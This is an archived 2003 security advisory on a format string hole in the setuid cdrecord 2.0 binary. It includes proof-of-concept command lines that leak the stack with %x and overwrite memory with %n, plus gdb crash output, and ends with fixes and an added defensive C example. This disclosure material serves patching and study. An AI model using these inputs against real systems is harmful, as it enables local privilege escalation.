cdrtools2.0 Format String Vulnerability

From: Stefano Di Paola (st0r1eat_private)
Date: Tue May 13 2003 - 01:27:36 PDT


    ----------------------------------------------------------------------------
    PACKAGE           : cdrtools
    VERSION           : 2.0 
    SUMMARY           : Format String
    SEVERITY          : local root exploit if suid (on several distros)
    DATE              : 2003-05-05
    ----------------------------------------------------------------------------
    
    
    Hi,
    I would like to inform you that there is a format string vulnerability
    in cdrecord 2.0, in particular in libscg/scsiopen.c at line 273, I
    suppose:
    
    --------------------------------------------------------------
       271          if (scg__open(scgp, devname) <= 0) {
       272                  if (errs && scgp->errstr)
    
    >>>273                     js_snprintf(errs, slen, scgp->errstr);<<<<
       
       274                  scg_sfree(scgp);
       275                  return ((SCSI *)0);
       276          }
    _______________________________________________________
    !-------         W A R N I N G      -----------!  
    !--- this  is an exploitable vulnerability! ---!
    !----------------------------------------------!
    Cdrecord is present in several distros as a setuid program, so this is a real
    security hole.
    
    e.g.
    $ ./cdrecord dev="AAAA|%x%x%x%x%x%x%x%x%x%x%x" int.c
    
    Cdrecord 2.0 (i586-pc-linux-gnu) Copyright (C) 1995-2002 Jörg Schilling
    scsidev: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
    devname: 'AAAABBBBCCCC|%x%x%x%x%x%x%x%x%x%x%x%x'
    scsibus: -2 target: -2 lun: -2
    Warning: Open by 'devname' is unintentional and not supported.
    ./cdrecord: File o directory inesistente. Cannot open
    'AAAABBBBCCCC|65bffff6743808b7c8ffffffff000fffffffe4141414142424242.
    Cannot open SCSI driver.
    ./cdrecord: For possible targets try 'cdrecord -scanbus'. Make sure you
    are root.
    as you can see the last %x refers to AAAABBBBCCCC, so I can use %n for
    overwriting anything I want:
    e.g. I can find on the stack the location of the return address...
    let's say 0xbffcffcc:
    $ ./cdrecord dev=`printf "\xec\xed\xff\xbfBBBBCCCC|%%x%%x%%x%%x%%x%%x%%x%%x%%n"` c/int.c
    .....snip....
    (core dump)
    $ gdb   `which cdrecord`  core -q
    ....snip...
    #0  0x3f in ?? ()
    (gdb) bt
    #0  0x3f in ?? ()
    #1  0x8065451 in scg_open ()
    #2  0x8049a3b in main ()
    ...
    
    so it's exploitable.
    
    Solutions:
    
    A. An updated package can be found at:
    
    	ftp://ftp.berlios.de/pub/cdrecord/alpha/cdrtools-2.01a14.tar.gz
    
    B. Replace line 273 of libscg/scsiopen.c with:
    	 js_snprintf(errs, slen, "%s", scgp->errstr);
    
    C. Remove the suid bit with:
    	chmod 755 `which cdrecord`
    
    
    
    Regards,
    Stefano Di Paola
    
    ------------------
    
    Stefano Di Paola
    Software Engineer
    stefano.dipaola1<at>tin<dot>it
    st0r1e<at>libero<dot>com
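
The fix in solution B, as an added C example that is not part of the post above or of cdrtools: `copy_errstr` is an invented name for the hardened line-273 pattern (user-derived text passed as a `"%s"` argument, with safe truncation), and `count_format_directives` is an invented defensive check that lets a defender flag `dev=` arguments carrying conversion directives in audit logs.

```c
#include <stdio.h>
#include <string.h>

/*
 * Hardened form of the line-273 pattern (added example, not cdrtools code).
 * The vulnerable call, js_snprintf(errs, slen, scgp->errstr), used text
 * derived from the user's dev= argument as the FORMAT string.  Here that
 * text is always passed as a "%s" argument, so '%' sequences are copied
 * literally.  Returns the number of characters stored (excluding the NUL);
 * the message is truncated safely when it does not fit in slen bytes.
 */
size_t copy_errstr(char *errs, size_t slen, const char *errstr)
{
    if (errs == NULL || slen == 0)
        return 0;
    if (errstr == NULL)
        errstr = "";
    int n = snprintf(errs, slen, "%s", errstr);  /* errstr is data, not format */
    if (n < 0) {                                 /* encoding error: empty result */
        errs[0] = '\0';
        return 0;
    }
    return (size_t)n < slen ? (size_t)n : slen - 1;
}

/*
 * Defensive check for audit logging: count printf conversion directives in
 * an untrusted string such as a dev= argument.  "%%" is a literal percent
 * and is not counted; any other directive in a device name is worth flagging.
 */
int count_format_directives(const char *s)
{
    int count = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {  /* escaped percent sign */
            p++;
            continue;
        }
        count++;
    }
    return count;
}

int main(void)
{
    char errs[64];
    const char *devname = "AAAA|%x%x%x%n";  /* constructed sample input */
    copy_errstr(errs, sizeof errs, devname);
    printf("stored literally: '%s', %d directives\n", errs,
           count_format_directives(devname));
    return 0;
}
```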
    



    This archive was generated by hypermail 2b30 : Tue May 13 2003 - 12:53:01 PDT